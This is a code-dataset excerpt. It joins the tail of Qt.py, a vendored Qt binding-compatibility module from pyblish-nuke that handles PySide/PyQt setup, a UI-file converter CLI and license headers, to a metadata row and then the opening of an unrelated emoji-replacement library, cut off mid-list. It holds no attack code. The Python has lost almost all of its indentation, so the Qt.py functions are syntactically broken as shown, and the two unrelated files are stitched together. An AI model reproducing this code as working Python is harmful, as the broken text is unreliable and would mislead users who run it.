except ImportError as e2:
_warn_import_error(e, name)
_warn_import_error(e2, name)
continue
setattr(Qt, "_" + name, submodule)
if name not in extras:
# Store reference to original binding,
# but don't store speciality modules
# such as uic or QtUiTools
setattr(Qt, name, _new_module(name))
def _reassign_misplaced_members(binding):
"""Apply misplaced members from `binding` to Qt.py
Arguments:
binding (dict): Misplaced members
"""
for src, dst in _misplaced_members[binding].items():
dst_value = None
src_parts = src.split(".")
src_module = src_parts[0]
src_member = None
if len(src_parts) > 1:
src_member = src_parts[1:]
if isinstance(dst, (list, tuple)):
dst, dst_value = dst
dst_parts = dst.split(".")
dst_module = dst_parts[0]
dst_member = None
if len(dst_parts) > 1:
dst_member = dst_parts[1]
        # Get the member we want to store in the namespace.
if not dst_value:
try:
_part = getattr(Qt, "_" + src_module)
while src_member:
member = src_member.pop(0)
_part = getattr(_part, member)
dst_value = _part
except AttributeError:
# If the member we want to store in the namespace does not
# exist, there is no need to continue. This can happen if a
# request was made to rename a member that didn't exist, for
# example if QtWidgets isn't available on the target platform.
_log("Misplaced member has no source: {0}".format(src))
continue
try:
src_object = getattr(Qt, dst_module)
except AttributeError:
if dst_module not in _common_members:
                # Only create the Qt parent module if it's listed in
# _common_members. Without this check, if you remove QtCore
# from _common_members, the default _misplaced_members will add
# Qt.QtCore so it can add Signal, Slot, etc.
msg = 'Not creating missing member module "{m}" for "{c}"'
_log(msg.format(m=dst_module, c=dst_member))
continue
# If the dst is valid but the Qt parent module does not exist
# then go ahead and create a new module to contain the member.
setattr(Qt, dst_module, _new_module(dst_module))
src_object = getattr(Qt, dst_module)
# Enable direct import of the new module
sys.modules[__name__ + "." + dst_module] = src_object
if not dst_value:
dst_value = getattr(Qt, "_" + src_module)
if src_member:
dst_value = getattr(dst_value, src_member)
setattr(src_object, dst_member or dst_module, dst_value)
def _build_compatibility_members(binding, decorators=None):
"""Apply `binding` to QtCompat
Arguments:
binding (str): Top level binding in _compatibility_members.
decorators (dict, optional): Provides the ability to decorate the
original Qt methods when needed by a binding. This can be used
to change the returned value to a standard value. The key should
be the classname, the value is a dict where the keys are the
target method names, and the values are the decorator functions.
"""
decorators = decorators or dict()
# Allow optional site-level customization of the compatibility members.
# This method does not need to be implemented in QtSiteConfig.
try:
import QtSiteConfig
except ImportError:
pass
else:
if hasattr(QtSiteConfig, "update_compatibility_decorators"):
QtSiteConfig.update_compatibility_decorators(binding, decorators)
_QtCompat = type("QtCompat", (object,), {})
for classname, bindings in _compatibility_members[binding].items():
attrs = {}
for target, binding in bindings.items():
namespaces = binding.split(".")
try:
src_object = getattr(Qt, "_" + namespaces[0])
except AttributeError as e:
_log("QtCompat: AttributeError: %s" % e)
# Skip reassignment of non-existing members.
# This can happen if a request was made to
# rename a member that didn't exist, for example
# if QtWidgets isn't available on the target platform.
continue
# Walk down any remaining namespace getting the object assuming
# that if the first namespace exists the rest will exist.
for namespace in namespaces[1:]:
src_object = getattr(src_object, namespace)
# decorate the Qt method if a decorator was provided.
if target in decorators.get(classname, []):
# staticmethod must be called on the decorated method to
# prevent a TypeError being raised when the decorated method
# is called.
src_object = staticmethod(decorators[classname][target](src_object))
attrs[target] = src_object
# Create the QtCompat class and install it into the namespace
compat_class = type(classname, (_QtCompat,), attrs)
setattr(Qt.QtCompat, classname, compat_class)
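# Example (sketch, `view` being a hypothetical QTreeView): the generated class
# proxies live on Qt.QtCompat and offer one spelling per member, regardless of
# which binding supplied the implementation:
#
#   from Qt import QtCompat
#
#   header = view.header()
#   QtCompat.QHeaderView.setSectionsClickable(header, True)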
def _pyside2():
"""Initialise PySide2
These functions serve to test the existence of a binding
    and to set it up in such a way that it aligns with
    the final step: adding members from the original binding
to Qt.py
"""
import PySide2 as module
extras = ["QtUiTools"]
try:
try:
# Before merge of PySide and shiboken
import shiboken2
except ImportError:
# After merge of PySide and shiboken, May 2017
from PySide2 import shiboken2
extras.append("shiboken2")
except ImportError:
pass
_setup(module, extras)
Qt.__binding_version__ = module.__version__
if hasattr(Qt, "_shiboken2"):
Qt.QtCompat.wrapInstance = _wrapinstance
Qt.QtCompat.getCppPointer = _getcpppointer
Qt.QtCompat.delete = shiboken2.delete
if hasattr(Qt, "_QtUiTools"):
Qt.QtCompat.loadUi = _loadUi
if hasattr(Qt, "_QtCore"):
Qt.__qt_version__ = Qt._QtCore.qVersion()
Qt.QtCompat.dataChanged = (
lambda self, topleft, bottomright, roles=None: self.dataChanged.emit(
topleft, bottomright, roles or []
)
)
if hasattr(Qt, "_QtWidgets"):
Qt.QtCompat.setSectionResizeMode = (
Qt._QtWidgets.QHeaderView.setSectionResizeMode
)
_reassign_misplaced_members("PySide2")
_build_compatibility_members("PySide2")
def _pyside():
"""Initialise PySide"""
import PySide as module
extras = ["QtUiTools"]
try:
try:
# Before merge of PySide and shiboken
import shiboken
except ImportError:
# After merge of PySide and shiboken, May 2017
from PySide import shiboken
extras.append("shiboken")
except ImportError:
pass
_setup(module, extras)
Qt.__binding_version__ = module.__version__
if hasattr(Qt, "_shiboken"):
Qt.QtCompat.wrapInstance = _wrapinstance
Qt.QtCompat.getCppPointer = _getcpppointer
Qt.QtCompat.delete = shiboken.delete
if hasattr(Qt, "_QtUiTools"):
Qt.QtCompat.loadUi = _loadUi
if hasattr(Qt, "_QtGui"):
setattr(Qt, "QtWidgets", _new_module("QtWidgets"))
setattr(Qt, "_QtWidgets", Qt._QtGui)
if hasattr(Qt._QtGui, "QX11Info"):
setattr(Qt, "QtX11Extras", _new_module("QtX11Extras"))
Qt.QtX11Extras.QX11Info = Qt._QtGui.QX11Info
Qt.QtCompat.setSectionResizeMode = Qt._QtGui.QHeaderView.setResizeMode
if hasattr(Qt, "_QtCore"):
Qt.__qt_version__ = Qt._QtCore.qVersion()
Qt.QtCompat.dataChanged = (
lambda self, topleft, bottomright, roles=None: self.dataChanged.emit(
topleft, bottomright
)
)
_reassign_misplaced_members("PySide")
_build_compatibility_members("PySide")
def _pyqt5():
"""Initialise PyQt5"""
import PyQt5 as module
extras = ["uic"]
try:
# Relevant to PyQt5 5.11 and above
from PyQt5 import sip
extras += ["sip"]
except ImportError:
try:
import sip
extras += ["sip"]
except ImportError:
sip = None
_setup(module, extras)
if hasattr(Qt, "_sip"):
Qt.QtCompat.wrapInstance = _wrapinstance
Qt.QtCompat.getCppPointer = _getcpppointer
Qt.QtCompat.delete = sip.delete
if hasattr(Qt, "_uic"):
Qt.QtCompat.loadUi = _loadUi
if hasattr(Qt, "_QtCore"):
Qt.__binding_version__ = Qt._QtCore.PYQT_VERSION_STR
Qt.__qt_version__ = Qt._QtCore.QT_VERSION_STR
Qt.QtCompat.dataChanged = (
lambda self, topleft, bottomright, roles=None: self.dataChanged.emit(
topleft, bottomright, roles or []
)
)
if hasattr(Qt, "_QtWidgets"):
Qt.QtCompat.setSectionResizeMode = (
Qt._QtWidgets.QHeaderView.setSectionResizeMode
)
_reassign_misplaced_members("PyQt5")
_build_compatibility_members("PyQt5")
def _pyqt4():
"""Initialise PyQt4"""
import sip
    # Validation of environment variable. Prevents an error if
# the variable is invalid since it's just a hint.
try:
hint = int(QT_SIP_API_HINT)
except TypeError:
hint = None # Variable was None, i.e. not set.
except ValueError:
raise ImportError("QT_SIP_API_HINT=%s must be a 1 or 2")
for api in (
"QString",
"QVariant",
"QDate",
"QDateTime",
"QTextStream",
"QTime",
"QUrl",
):
try:
sip.setapi(api, hint or 2)
except AttributeError:
raise ImportError("PyQt4 < 4.6 isn't supported by Qt.py")
except ValueError:
actual = sip.getapi(api)
if not hint:
raise ImportError("API version already set to %d" % actual)
else:
# Having provided a hint indicates a soft constraint, one
# that doesn't throw an exception.
sys.stderr.write(
"Warning: API '%s' has already been set to %d.\n" % (api, actual)
)
import PyQt4 as module
extras = ["uic"]
try:
import sip
extras.append(sip.__name__)
except ImportError:
sip = None
_setup(module, extras)
if hasattr(Qt, "_sip"):
Qt.QtCompat.wrapInstance = _wrapinstance
Qt.QtCompat.getCppPointer = _getcpppointer
Qt.QtCompat.delete = sip.delete
if hasattr(Qt, "_uic"):
Qt.QtCompat.loadUi = _loadUi
if hasattr(Qt, "_QtGui"):
setattr(Qt, "QtWidgets", _new_module("QtWidgets"))
setattr(Qt, "_QtWidgets", Qt._QtGui)
if hasattr(Qt._QtGui, "QX11Info"):
setattr(Qt, "QtX11Extras", _new_module("QtX11Extras"))
Qt.QtX11Extras.QX11Info = Qt._QtGui.QX11Info
Qt.QtCompat.setSectionResizeMode = Qt._QtGui.QHeaderView.setResizeMode
if hasattr(Qt, "_QtCore"):
Qt.__binding_version__ = Qt._QtCore.PYQT_VERSION_STR
Qt.__qt_version__ = Qt._QtCore.QT_VERSION_STR
Qt.QtCompat.dataChanged = (
lambda self, topleft, bottomright, roles=None: self.dataChanged.emit(
topleft, bottomright
)
)
_reassign_misplaced_members("PyQt4")
# QFileDialog QtCompat decorator
def _standardizeQFileDialog(some_function):
"""Decorator that makes PyQt4 return conform to other bindings"""
def wrapper(*args, **kwargs):
ret = some_function(*args, **kwargs)
# PyQt4 only returns the selected filename, force it to a
            # standard return of the selected filename, and an empty string
# for the selected filter
return ret, ""
wrapper.__doc__ = some_function.__doc__
wrapper.__name__ = some_function.__name__
return wrapper
decorators = {
"QFileDialog": {
"getOpenFileName": _standardizeQFileDialog,
"getOpenFileNames": _standardizeQFileDialog,
"getSaveFileName": _standardizeQFileDialog,
}
}
_build_compatibility_members("PyQt4", decorators)
def _none():
"""Internal option (used in installer)"""
Mock = type("Mock", (), {"__getattr__": lambda Qt, attr: None})
Qt.__binding__ = "None"
Qt.__qt_version__ = "0.0.0"
Qt.__binding_version__ = "0.0.0"
Qt.QtCompat.loadUi = lambda uifile, baseinstance=None: None
Qt.QtCompat.setSectionResizeMode = lambda *args, **kwargs: None
for submodule in _common_members.keys():
setattr(Qt, submodule, Mock())
setattr(Qt, "_" + submodule, Mock())
def _log(text):
if QT_VERBOSE:
sys.stdout.write("Qt.py [info]: %s\n" % text)
def _warn(text):
try:
sys.stderr.write("Qt.py [warning]: %s\n" % text)
except UnicodeDecodeError:
import locale
encoding = locale.getpreferredencoding()
sys.stderr.write("Qt.py [warning]: %s\n" % text.decode(encoding))
def _convert(lines):
"""Convert compiled .ui file from PySide2 to Qt.py
Arguments:
        lines (list): Each line of the .ui file
Usage:
>> with open("myui.py") as f:
.. lines = _convert(f.readlines())
"""
def parse(line):
line = line.replace("from PySide2 import", "from Qt import QtCompat,")
line = line.replace("QtWidgets.QApplication.translate", "QtCompat.translate")
if "QtCore.SIGNAL" in line:
raise NotImplementedError(
"QtCore.SIGNAL is missing from PyQt5 "
"and so Qt.py does not support it: you "
"should avoid defining signals inside "
"your ui files."
)
return line
parsed = list()
for line in lines:
line = parse(line)
parsed.append(line)
return parsed
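# Example (sketch): a pyside2-uic generated import is rerouted through Qt.py:
#
#   _convert(["from PySide2 import QtWidgets\n"])
#   # -> ["from Qt import QtCompat, QtWidgets\n"]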
def _cli(args):
"""Qt.py command-line interface"""
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
"--convert", help="Path to compiled Python module, e.g. my_ui.py"
)
parser.add_argument(
"--compile",
help="Accept raw .ui file and compile with native " "PySide2 compiler.",
)
parser.add_argument(
"--stdout", help="Write to stdout instead of file", action="store_true"
)
parser.add_argument(
"--stdin", help="Read from stdin instead of file", action="store_true"
)
args = parser.parse_args(args)
if args.stdout:
raise NotImplementedError("--stdout")
if args.stdin:
raise NotImplementedError("--stdin")
if args.compile:
raise NotImplementedError("--compile")
if args.convert:
sys.stdout.write(
"#\n"
"# WARNING: --convert is an ALPHA feature.\n#\n"
"# See https://github.com/mottosso/Qt.py/pull/132\n"
"# for details.\n"
"#\n"
)
#
# ------> Read
#
with open(args.convert) as f:
lines = _convert(f.readlines())
backup = "%s_backup%s" % os.path.splitext(args.convert)
sys.stdout.write('Creating "%s"..\n' % backup)
shutil.copy(args.convert, backup)
#
# <------ Write
#
with open(args.convert, "w") as f:
f.write("".join(lines))
sys.stdout.write('Successfully converted "%s"\n' % args.convert)
class MissingMember(object):
"""
A placeholder type for a missing Qt object not
included in Qt.py
Args:
name (str): The name of the missing type
details (str): An optional custom error message
"""
ERR_TMPL = (
"{} is not a common object across PySide2 "
"and the other Qt bindings. It is not included "
"as a common member in the Qt.py layer"
)
def __init__(self, name, details=""):
self.__name = name
self.__err = self.ERR_TMPL.format(name)
if details:
self.__err = "{}: {}".format(self.__err, details)
def __repr__(self):
return "<{}: {}>".format(self.__class__.__name__, self.__name)
def __getattr__(self, name):
raise NotImplementedError(self.__err)
def __call__(self, *a, **kw):
raise NotImplementedError(self.__err)
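# Example (sketch): a placeholder such as the one installed for QtGui.QMatrix
# defers failure from import time to first use:
#
#   from Qt import QtGui
#
#   QtGui.QMatrix()  # raises NotImplementedError, including the
#                    # "Deprecated in PyQt5" details string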
def _install():
# Default order (customize order and content via QT_PREFERRED_BINDING)
default_order = ("PySide2", "PyQt5", "PySide", "PyQt4")
preferred_order = None
if QT_PREFERRED_BINDING_JSON:
# A per-vendor preferred binding customization was defined
# This should be a dictionary of the full Qt.py module namespace to
# apply binding settings to. The "default" key can be used to apply
# custom bindings to all modules not explicitly defined. If the json
        # data is invalid this will raise an exception.
# Example:
# {"mylibrary.vendor.Qt": ["PySide2"], "default":["PyQt5","PyQt4"]}
try:
preferred_bindings = json.loads(QT_PREFERRED_BINDING_JSON)
except ValueError:
# Python 2 raises ValueError, Python 3 raises json.JSONDecodeError
# a subclass of ValueError
_warn(
"Failed to parse QT_PREFERRED_BINDING_JSON='%s'"
% QT_PREFERRED_BINDING_JSON
)
_warn("Falling back to default preferred order")
else:
preferred_order = preferred_bindings.get(__name__)
# If no matching binding was used, optionally apply a default.
if preferred_order is None:
preferred_order = preferred_bindings.get("default", None)
if preferred_order is None:
        # If a json preferred binding was not used, respect the
# QT_PREFERRED_BINDING environment variable if defined.
preferred_order = list(b for b in QT_PREFERRED_BINDING.split(os.pathsep) if b)
order = preferred_order or default_order
available = {
"PySide2": _pyside2,
"PyQt5": _pyqt5,
"PySide": _pyside,
"PyQt4": _pyqt4,
"None": _none,
}
_log("Order: '%s'" % "', '".join(order))
# Allow site-level customization of the available modules.
_apply_site_config()
found_binding = False
for name in order:
_log("Trying %s" % name)
try:
available[name]()
found_binding = True
break
except ImportError as e:
_log("ImportError: %s" % e)
except KeyError:
_log("ImportError: Preferred binding '%s' not found." % name)
if not found_binding:
        # If no binding was found, raise this error
        raise ImportError("No Qt binding was found.")
# Install individual members
for name, members in _common_members.items():
try:
their_submodule = getattr(Qt, "_%s" % name)
except AttributeError:
continue
our_submodule = getattr(Qt, name)
# Enable import *
__all__.append(name)
# Enable direct import of submodule,
# e.g. import Qt.QtCore
sys.modules[__name__ + "." + name] = our_submodule
for member in members:
# Accept that a submodule may miss certain members.
try:
their_member = getattr(their_submodule, member)
except AttributeError:
_log("'%s.%s' was missing." % (name, member))
continue
setattr(our_submodule, member, their_member)
# Install missing member placeholders
for name, members in _missing_members.items():
our_submodule = getattr(Qt, name)
for member in members:
# If the submodule already has this member installed,
# either by the common members, or the site config,
# then skip installing this one over it.
if hasattr(our_submodule, member):
continue
placeholder = MissingMember(
"{}.{}".format(name, member), details=members[member]
)
setattr(our_submodule, member, placeholder)
# Enable direct import of QtCompat
sys.modules[__name__ + ".QtCompat"] = Qt.QtCompat
# Backwards compatibility
if hasattr(Qt.QtCompat, "loadUi"):
Qt.QtCompat.load_ui = Qt.QtCompat.loadUi
_install()
# Setup Binding Enum states
Qt.IsPySide2 = Qt.__binding__ == "PySide2"
Qt.IsPyQt5 = Qt.__binding__ == "PyQt5"
Qt.IsPySide = Qt.__binding__ == "PySide"
Qt.IsPyQt4 = Qt.__binding__ == "PyQt4"
"""Augment QtCompat
QtCompat contains wrappers and added functionality
on top of the original bindings, such as the CLI interface,
along with members that are otherwise incompatible between
bindings, such as `QHeaderView.setSectionResizeMode`.
"""
Qt.QtCompat._cli = _cli
Qt.QtCompat._convert = _convert
# Enable command-line interface
if __name__ == "__main__":
_cli(sys.argv[1:])
# The MIT License (MIT)
#
# Copyright (c) 2016-2017 Marcus Ottosson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# In PySide(2), loadUi does not exist, so we implement it
#
# `_UiLoader` is adapted from the qtpy project, which was further influenced
# by qt-helpers which was released under a 3-clause BSD license which in turn
# is based on a solution at:
#
# - https://gist.github.com/cpbotha/1b42a20c8f3eb9bb7cb8
#
# The License for this code is as follows:
#
# qt-helpers - a common front-end to various Qt modules
#
# Copyright (c) 2015, Chris Beaumont and Thomas Robitaille
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the
# distribution.
# * Neither the name of the Glue project nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Which itself was based on the solution at
#
# https://gist.github.com/cpbotha/1b42a20c8f3eb9bb7cb8
#
# which was released under the MIT license:
#
# Copyright (c) 2011 Sebastian Wiesner <lunaryorn@gmail.com>
# Modifications by Charl Botha <cpbotha@vxlabs.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files
# (the "Software"),to deal in the Software without restriction,
# including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
|
pyblish/pyblish-nuke
|
pyblish_nuke/vendor/Qt.py
|
Python
|
lgpl-3.0
| 65,250
|
[
"VisIt"
] |
913f15a0ffae38d306fb20bf0600c35ce8d448cc57cb3dec5a3ac15e9ac8b8af
|
# -*- coding: utf-8 -*-
"""
inject-emoji
~~~~~~~~~~~~
inject-emoji is a simple library, written in Python, for emoji fans.
Using codes described at emoji-cheat-sheet.com, codes found within
input data are replaced with HTML image tags in the output.
:copyright: (c) 2016 by Clay Loveless.
:license: MIT, see LICENSE for more details.
"""
import os
import re
import sys
BUNDLED_EMOJI = [
r'\+1', r'\-1', '100', '1234', '8ball', 'a', 'ab', 'abc', 'abcd', 'accept',
'aerial_tramway', 'airplane', 'alarm_clock', 'alien', 'ambulance',
'anchor', 'angel', 'anger', 'angry', 'anguished', 'ant', 'apple',
'aquarius', 'aries', 'arrow_backward', 'arrow_double_down',
'arrow_double_up', 'arrow_down', 'arrow_down_small', 'arrow_forward',
'arrow_heading_down', 'arrow_heading_up', 'arrow_left', 'arrow_lower_left',
'arrow_lower_right', 'arrow_right', 'arrow_right_hook', 'arrow_up',
'arrow_up_down', 'arrow_up_small', 'arrow_upper_left', 'arrow_upper_right',
'arrows_clockwise', 'arrows_counterclockwise', 'art', 'articulated_lorry',
'astonished', 'atm', 'b', 'baby', 'baby_bottle', 'baby_chick',
'baby_symbol', 'back', 'baggage_claim', 'balloon', 'ballot_box_with_check',
'bamboo', 'banana', 'bangbang', 'bank', 'bar_chart', 'barber', 'baseball',
'basketball', 'bath', 'bathtub', 'battery', 'bear', 'bee', 'beer', 'beers',
'beetle', 'beginner', 'bell', 'bento', 'bicyclist', 'bike', 'bikini',
'bird', 'birthday', 'black_circle', 'black_joker',
'black_medium_small_square', 'black_medium_square', 'black_nib',
'black_small_square', 'black_square', 'black_square_button', 'blossom',
'blowfish', 'blue_book', 'blue_car', 'blue_heart', 'blush', 'boar', 'boat',
'bomb', 'book', 'bookmark', 'bookmark_tabs', 'books', 'boom', 'boot',
'bouquet', 'bow', 'bowling', 'bowtie', 'boy', 'bread', 'bride_with_veil',
'bridge_at_night', 'briefcase', 'broken_heart', 'bug', 'bulb',
'bullettrain_front', 'bullettrain_side', 'bus', 'busstop',
'bust_in_silhouette', 'busts_in_silhouette', 'cactus', 'cake', 'calendar',
'calling', 'camel', 'camera', 'cancer', 'candy', 'capital_abcd',
'capricorn', 'car', 'card_index', 'carousel_horse', 'cat', 'cat2', 'cd',
'chart', 'chart_with_downwards_trend', 'chart_with_upwards_trend',
'checkered_flag', 'cherries', 'cherry_blossom', 'chestnut', 'chicken',
'children_crossing', 'chocolate_bar', 'christmas_tree', 'church', 'cinema',
'circus_tent', 'city_sunrise', 'city_sunset', 'cl', 'clap', 'clapper',
'clipboard', 'clock1', 'clock10', 'clock1030', 'clock11', 'clock1130',
'clock12', 'clock1230', 'clock130', 'clock2', 'clock230', 'clock3',
'clock330', 'clock4', 'clock430', 'clock5', 'clock530', 'clock6',
'clock630', 'clock7', 'clock730', 'clock8', 'clock830', 'clock9',
'clock930', 'closed_book', 'closed_lock_with_key', 'closed_umbrella',
'cloud', 'clubs', 'cn', 'cocktail', 'coffee', 'cold_sweat', 'collision',
'computer', 'confetti_ball', 'confounded', 'confused', 'congratulations',
'construction', 'construction_worker', 'convenience_store', 'cookie',
'cool', 'cop', 'copyright', 'corn', 'couple', 'couple_with_heart',
'couplekiss', 'cow', 'cow2', 'credit_card', 'crescent_moon', 'crocodile',
'crossed_flags', 'crown', 'cry', 'crying_cat_face', 'crystal_ball',
'cupid', 'curly_loop', 'currency_exchange', 'curry', 'custard', 'customs',
'cyclone', 'dancer', 'dancers', 'dango', 'dart', 'dash', 'date', 'de',
'deciduous_tree', 'department_store', 'diamond_shape_with_a_dot_inside',
'diamonds', 'disappointed', 'disappointed_relieved', 'dizzy', 'dizzy_face',
'do_not_litter', 'dog', 'dog2', 'dollar', 'dolls', 'dolphin', 'donut',
'door', 'doughnut', 'dragon', 'dragon_face', 'dress', 'dromedary_camel',
'droplet', 'dvd', 'e-mail', 'ear', 'ear_of_rice', 'earth_africa',
'earth_americas', 'earth_asia', 'egg', 'eggplant', 'eight',
'eight_pointed_black_star', 'eight_spoked_asterisk', 'electric_plug',
'elephant', 'email', 'end', 'envelope', 'es', 'euro', 'european_castle',
'european_post_office', 'evergreen_tree', 'exclamation', 'expressionless',
'eyeglasses', 'eyes', 'facepunch', 'factory', 'fallen_leaf', 'family',
'fast_forward', 'fax', 'fearful', 'feelsgood', 'feet', 'ferris_wheel',
'file_folder', 'finnadie', 'fire', 'fire_engine', 'fireworks',
'first_quarter_moon', 'first_quarter_moon_with_face', 'fish', 'fish_cake',
'fishing_pole_and_fish', 'fist', 'five', 'flags', 'flashlight',
'floppy_disk', 'flower_playing_cards', 'flushed', 'foggy', 'football',
'fork_and_knife', 'fountain', 'four', 'four_leaf_clover', 'fr', 'free',
'fried_shrimp', 'fries', 'frog', 'frowning', 'fu', 'fuelpump', 'full_moon',
'full_moon_with_face', 'game_die', 'gb', 'gem', 'gemini', 'ghost', 'gift',
'gift_heart', 'girl', 'globe_with_meridians', 'goat', 'goberserk',
'godmode', 'golf', 'grapes', 'green_apple', 'green_book', 'green_heart',
'grey_exclamation', 'grey_question', 'grimacing', 'grin', 'grinning',
'guardsman', 'guitar', 'gun', 'haircut', 'hamburger', 'hammer', 'hamster',
'hand', 'handbag', 'hankey', 'hash', 'hatched_chick', 'hatching_chick',
'headphones', 'hear_no_evil', 'heart', 'heart_decoration', 'heart_eyes',
'heart_eyes_cat', 'heartbeat', 'heartpulse', 'hearts', 'heavy_check_mark',
'heavy_division_sign', 'heavy_dollar_sign', 'heavy_exclamation_mark',
'heavy_minus_sign', 'heavy_multiplication_x', 'heavy_plus_sign',
'helicopter', 'herb', 'hibiscus', 'high_brightness', 'high_heel', 'hocho',
'honey_pot', 'honeybee', 'horse', 'horse_racing', 'hospital', 'hotel',
'hotsprings', 'hourglass', 'hourglass_flowing_sand', 'house',
'house_with_garden', 'hurtrealbad', 'hushed', 'ice_cream', 'icecream',
'id', 'ideograph_advantage', 'imp', 'inbox_tray', 'incoming_envelope',
'information_desk_person', 'information_source', 'innocent', 'interrobang',
'iphone', 'it', 'izakaya_lantern', 'jack_o_lantern', 'japan',
'japanese_castle', 'japanese_goblin', 'japanese_ogre', 'jeans', 'joy',
'joy_cat', 'jp', 'key', 'keycap_ten', 'kimono', 'kiss', 'kissing',
'kissing_cat', 'kissing_closed_eyes', 'kissing_face', 'kissing_heart',
'kissing_smiling_eyes', 'koala', 'koko', 'kr', 'large_blue_circle',
'large_blue_diamond', 'large_orange_diamond', 'last_quarter_moon',
'last_quarter_moon_with_face', 'laughing', 'leaves', 'ledger',
'left_luggage', 'left_right_arrow', 'leftwards_arrow_with_hook', 'lemon',
'leo', 'leopard', 'libra', 'light_rail', 'link', 'lips', 'lipstick',
'lock', 'lock_with_ink_pen', 'lollipop', 'loop', 'loudspeaker',
'love_hotel', 'love_letter', 'low_brightness', 'm', 'mag', 'mag_right',
'mahjong', 'mailbox', 'mailbox_closed', 'mailbox_with_mail',
'mailbox_with_no_mail', 'man', 'man_with_gua_pi_mao', 'man_with_turban',
'mans_shoe', 'maple_leaf', 'mask', 'massage', 'meat_on_bone', 'mega',
'melon', 'memo', 'mens', 'metal', 'metro', 'microphone', 'microscope',
'milky_way', 'minibus', 'minidisc', 'mobile_phone_off', 'money_with_wings',
'moneybag', 'monkey', 'monkey_face', 'monorail', 'mortar_board',
'mount_fuji', 'mountain_bicyclist', 'mountain_cableway',
'mountain_railway', 'mouse', 'mouse2', 'movie_camera', 'moyai', 'muscle',
'mushroom', 'musical_keyboard', 'musical_note', 'musical_score', 'mute',
'nail_care', 'name_badge', 'neckbeard', 'necktie',
'negative_squared_cross_mark', 'neutral_face', 'new', 'new_moon',
'new_moon_with_face', 'newspaper', 'ng', 'nine', 'no_bell', 'no_bicycles',
'no_entry', 'no_entry_sign', 'no_good', 'no_mobile_phones', 'no_mouth',
'no_pedestrians', 'no_smoking', 'non-potable_water', 'nose', 'notebook',
'notebook_with_decorative_cover', 'notes', 'nut_and_bolt', 'o', 'o2',
'ocean', 'octocat', 'octopus', 'oden', 'office', 'ok', 'ok_hand',
'ok_woman', 'older_man', 'older_woman', 'on', 'oncoming_automobile',
'oncoming_bus', 'oncoming_police_car', 'oncoming_taxi', 'one',
'open_file_folder', 'open_hands', 'open_mouth', 'ophiuchus', 'orange_book',
'outbox_tray', 'ox', 'package', 'page_facing_up', 'page_with_curl',
'pager', 'palm_tree', 'panda_face', 'paperclip', 'parking',
'part_alternation_mark', 'partly_sunny', 'passport_control', 'paw_prints',
'peach', 'pear', 'pencil', 'pencil2', 'penguin', 'pensive',
'performing_arts', 'persevere', 'person_frowning',
'person_with_blond_hair', 'person_with_pouting_face', 'phone', 'pig',
'pig2', 'pig_nose', 'pill', 'pineapple', 'pisces', 'pizza', 'plus1',
'point_down', 'point_left', 'point_right', 'point_up', 'point_up_2',
'police_car', 'poodle', 'poop', 'post_office', 'postal_horn', 'postbox',
'potable_water', 'pouch', 'poultry_leg', 'pound', 'pouting_cat', 'pray',
'princess', 'punch', 'purple_heart', 'purse', 'pushpin',
'put_litter_in_its_place', 'question', 'rabbit', 'rabbit2', 'racehorse',
'radio', 'radio_button', 'rage', 'rage1', 'rage2', 'rage3', 'rage4',
